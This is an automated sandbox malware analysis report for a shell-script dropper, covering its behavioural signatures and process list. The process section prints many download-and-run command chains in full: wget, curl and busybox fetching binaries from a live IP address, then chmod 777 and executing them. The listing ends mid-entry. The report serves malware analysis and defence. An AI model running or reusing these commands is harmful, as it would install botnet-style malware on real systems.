Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-d55apazlg1
Target d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
SHA256 d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76

Threat Level: Shows suspicious behavior

The file d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:36

Reported

2024-11-20 03:39

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

7s

Max time network

129s

Command Line

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy N/A
N/A /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk N/A
N/A /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 N/A
N/A /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 N/A
N/A /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 N/A
N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg N/A
N/A /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs N/A
N/A /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ N/A
N/A /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ N/A
N/A /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB N/A
N/A /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV N/A
N/A /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL N/A
N/A /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A
File opened for modification /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB /usr/bin/curl N/A
File opened for modification /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 /usr/bin/curl N/A
File opened for modification /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL /usr/bin/curl N/A
File opened for modification /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO /usr/bin/curl N/A
File opened for modification /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy /usr/bin/curl N/A
File opened for modification /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs /usr/bin/curl N/A
File opened for modification /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ /usr/bin/curl N/A
File opened for modification /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 /usr/bin/curl N/A
File opened for modification /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg /usr/bin/curl N/A

Processes

/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh

[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/chmod

[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL

[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/rm

[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/wget

[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/chmod

[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO

[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/bin/rm

[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/chmod

[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy

[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/bin/rm

[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]

/usr/bin/wget

[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/chmod

[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk

[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/bin/rm

[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]

/usr/bin/wget

[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/chmod

[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2

[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/bin/rm

[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]

/usr/bin/wget

[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/chmod

[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1

[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/bin/rm

[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]

/usr/bin/wget

[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/chmod

[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0

[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/bin/rm

[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]

/usr/bin/wget

[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/chmod

[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd

[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/bin/rm

[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]

/usr/bin/wget

[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/chmod

[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg

[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/bin/rm

[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]

/usr/bin/wget

[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/chmod

[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs

[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/bin/rm

[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]

/usr/bin/wget

[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/chmod

[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ

[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/bin/rm

[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/chmod

[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ

[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/bin/rm

[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]

/usr/bin/wget

[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/chmod

[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB

[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/bin/rm

[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]

/usr/bin/wget

[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/chmod

[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV

[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/bin/rm

[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]

/usr/bin/wget

[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]

/bin/busybox

